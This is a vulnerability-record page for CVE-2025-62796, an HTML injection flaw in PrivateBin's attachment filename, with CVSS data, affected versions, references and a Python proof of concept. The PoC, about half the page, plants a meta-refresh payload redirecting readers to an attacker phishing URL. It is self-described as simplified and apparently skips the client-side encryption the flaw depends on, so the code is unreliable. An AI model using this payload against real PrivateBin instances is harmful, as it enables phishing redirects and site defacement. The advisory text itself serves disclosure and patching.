Security Vulnerability Report
CVE-2025-62796 CVSS 5.8 MEDIUM

Published: 2025-10-28 21:15:41
Last Modified: 2026-04-15 00:35:42

Description

PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

PrivateBin 1.7.7
PrivateBin 1.7.8
PrivateBin 1.7.9
PrivateBin 1.8.0
PrivateBin 1.8.1
PrivateBin 1.8.2
PrivateBin 1.8.3
PrivateBin 2.0.0
PrivateBin 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-62796 PoC - PrivateBin HTML Injection via attachment_name
# This PoC demonstrates how to inject arbitrary HTML via attachment_name

TARGET_URL = "https://privatebin-instance.net/"


def create_malicious_paste():
    """
    Create a paste with malicious attachment_name containing HTML injection payload.
    The payload uses meta refresh tag to redirect users to attacker-controlled site.
    """
    injection_payload = '<meta http-equiv="refresh" content="0;url=https://attacker.com/phishing">'

    # PoC payload structure for PrivateBin API
    # Note: This is a simplified demonstration of the vulnerability concept
    paste_data = {
        "v": 2,
        "adata": [],
        "meta": {
            "attachment_name": injection_payload,
            "attachment_size": 1024
        },
        "hide": False
    }

    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "JSONHttpRequest"
    }

    try:
        response = requests.post(
            f"{TARGET_URL}",
            data=json.dumps(paste_data),
            headers=headers
        )
        print(f"[*] Response Status: {response.status_code}")
        return response.json()
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


def verify_injection(paste_id):
    """
    Verify that the HTML injection was successful by checking the paste content.
    """
    try:
        response = requests.get(f"{TARGET_URL}?pasteid={paste_id}&format=json")
        data = response.json()

        # Check if attachment_name is rendered without escaping
        if '<meta http-equiv="refresh"' in str(data):
            print("[!] VULNERABLE: HTML injection successful!")
            return True
        else:
            print("[*] SAFE: Injection payload was sanitized")
            return False
    except Exception as e:
        print(f"[!] Error verifying: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-62796 PoC - PrivateBin HTML Injection")
    print("=" * 60)

    result = create_malicious_paste()
    if result and "id" in result:
        print(f"[*] Paste created with ID: {result['id']}")
        verify_injection(result['id'])

References

https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e
https://github.com/PrivateBin/PrivateBin/pull/1550
https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g

Weaknesses

CWE-79
CWE-80

Record Details

Source Identifier: [email protected]
Vulnerability Status: Deferred
CVSS v3.1 Exploitability Score: 3.9
CVSS v3.1 Impact Score: 1.4
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: CHANGED
Confidentiality Impact: NONE
Integrity Impact: LOW
Availability Impact: NONE